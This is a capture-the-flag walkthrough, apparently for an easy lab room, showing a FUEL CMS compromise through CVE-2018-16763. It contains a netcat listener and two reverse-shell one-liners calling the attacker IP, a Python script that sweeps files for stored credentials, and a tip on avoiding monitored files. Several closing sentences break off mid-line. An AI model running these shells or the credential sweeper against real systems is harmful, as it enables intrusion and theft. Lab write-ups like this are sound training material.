Description: A new start-up has a few issues with their web server.
Free room, Difficulty: Easy
>:sudo nmap -sC -sV 'machine-ip'
This is the scan I use most of the time. -sC runs nmap's default script set against each open port and -sV probes the service behind every open port for its name and version. My results were:
The open port is 80 (HTTP). The website runs a content management system (CMS) named FUEL CMS.
To enumerate the machine further I want to scan it for directories, including hidden ones. For this I'm using GoBuster against the machine IP with a wordlist of commonly used directory names:
>:gobuster dir -u http://'machine-ip' -w /usr/share/dirb/wordlists/common.txt
A lot of directories! I went through all of them, and the useful one was /fuel, which turns out to be the CMS login page.
Because a CMS tends to have plenty of weak points, let's check whether exploit-db has an exploit for Fuel CMS.
One result, filed under CVE-2018-16763, gives us remote code execution against the CMS. I downloaded the script and changed its hard-coded URL to the machine IP. Then I marked it as executable and ran it. My output contained errors, mostly because of the proxy: the script sends its requests through a local proxy that wasn't running on my machine. To make the exploit work I had to comment out the proxy entries, which got rid of the errors. The exploit script should now look like this:
Entering the command whoami then returned www-data.
Some errors still follow further down, but the output we want is at the top.
Now that I can execute commands, I entered a reverse shell. To catch the connection we first have to set up a netcat listener on the attacking machine:
>:nc -lnvp 443
Now we can enter our reverse shell code (bash/netcat or python, whichever you like); 10.11.3.122 is the attacker's IP:
>:rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.11.3.122 443 >/tmp/f
>:python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.11.3.122",443));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
And then I upgraded my shell to a proper terminal with:
>:python -c 'import pty; pty.spawn("/bin/bash")'
Note: I found out that su, which we need later, refuses to run without a terminal. So upgrading the shell to a pty is essential for reaching the solution.
cat the “user.txt” file (*1). Then I searched for backups, because those tend to contain valuable information:
>:find / -type f -name "*.bak" 2>/dev/null
The 2>/dev/null at the end discards the "Permission denied" errors for directories I'm not allowed to read, so only real matches are shown.
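The find above looks only for *.bak files. As an added example that is not part of the post, the following Python sweep generalises it: it walks a tree for readable backup and configuration files (an application's database config is a typical place for a stored password, and FUEL CMS is a PHP application) and flags lines that look like stored credentials. The file-name and key patterns are my assumptions, and the sample tree it builds for offline use is constructed; python is available on the target, since the reverse shell above relies on it.

```python
"""Added example, not from the post: walk a directory for readable backup
and configuration files and flag lines that look like stored credentials.
Name and key patterns are assumptions; the sample tree is constructed."""
import os
import re
import tempfile
from typing import Dict, Iterator, List, Tuple

# Backups, plus config file names that commonly carry database credentials
CANDIDATE = re.compile(
    r"(\.(bak|old|orig|save|sql|env|conf|cfg|ini|yml|yaml)$|database\.php$|config\.php$)",
    re.IGNORECASE,
)
# key = value, key => 'value', key: value; the value must be non-empty,
# so placeholders such as 'password' => '' are not reported
CRED_LINE = re.compile(
    r"(pass(?:word|wd)?|pwd|secret|token|api_?key)"   # key
    r"['\"]?\]?\s*(?:=>|=|:)\s*"                      # separator, allows ['key'] =
    r"['\"]?([^'\"\s,;]+)",                           # value
    re.IGNORECASE,
)


def candidate_files(root: str) -> Iterator[str]:
    """Yield readable files under root whose name matches CANDIDATE;
    unreadable directories are skipped, as 2>/dev/null hid them above."""
    for dirpath, _dirs, files in os.walk(root, onerror=lambda _e: None):
        for name in files:
            path = os.path.join(dirpath, name)
            if CANDIDATE.search(name) and os.access(path, os.R_OK):
                yield path


def find_credentials(root: str) -> List[Tuple[str, int, str, str]]:
    """Return (path, line number, key, value) for credential-looking lines."""
    hits = []
    for path in candidate_files(root):
        try:
            with open(path, "r", errors="replace") as fh:
                for lineno, line in enumerate(fh, 1):
                    m = CRED_LINE.search(line)
                    if m:
                        hits.append((path, lineno, m.group(1).lower(), m.group(2)))
        except OSError:
            continue
    return hits


def demo() -> Dict[str, Tuple[int, str, str]]:
    """Constructed sample tree: a CodeIgniter-style database.php, a stray
    backup, and a .txt that must be ignored.  Returns {filename: (line, key, value)}."""
    base = tempfile.mkdtemp(prefix="credsweep-")
    cfg = os.path.join(base, "html", "app", "config")
    os.makedirs(cfg)
    with open(os.path.join(cfg, "database.php"), "w") as fh:
        fh.write("<?php\n$db['default']['username'] = 'root';\n"
                 "$db['default']['password'] = 'example-only';\n")
    with open(os.path.join(base, "notes.bak"), "w") as fh:
        fh.write("db_pass=changeme\nnothing here\n")
    with open(os.path.join(base, "readme.txt"), "w") as fh:
        fh.write("password = ignored-wrong-extension\n")
    return {os.path.basename(p): (n, k, v) for p, n, k, v in find_credentials(base)}


if __name__ == "__main__":
    for path, lineno, key, value in find_credentials("/var/www"):  # assumed web root
        print(f"{path}:{lineno}: {key} = {value}")
```

On a real target start from the web root rather than /, since that keeps the run fast and avoids touching files a monitoring agent may watch.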
After looking around, I found the password for root:
Okay, so we just found the password for the root user, and now we can switch our user to
After this you can just get the root flag from
Author: Puckiestyle